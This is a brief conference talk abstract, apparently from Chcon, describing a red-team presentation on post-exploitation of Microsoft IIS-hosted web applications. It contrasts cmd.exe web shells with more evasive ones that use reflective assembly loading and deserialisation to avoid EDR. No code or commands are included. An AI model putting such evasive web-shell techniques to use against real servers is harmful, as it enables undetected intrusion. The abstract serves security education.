Chcon

Security controls such as endpoint detection and response (EDR) continue to mature, thereby increasing the amount of effort adversaries must invest to successfully execute intrusions, remain undetected and achieve their objectives. This presentation will cover techniques that red teams can use to perform post exploitation against web applications hosted by Microsoft’s Internet Information Services (IIS) while evading modern security controls. The concerns that come with using traditional “cmd.exe” web shells will be discussed before demonstrating more mature web shells which make use of reflective assembly loading and deserialisation.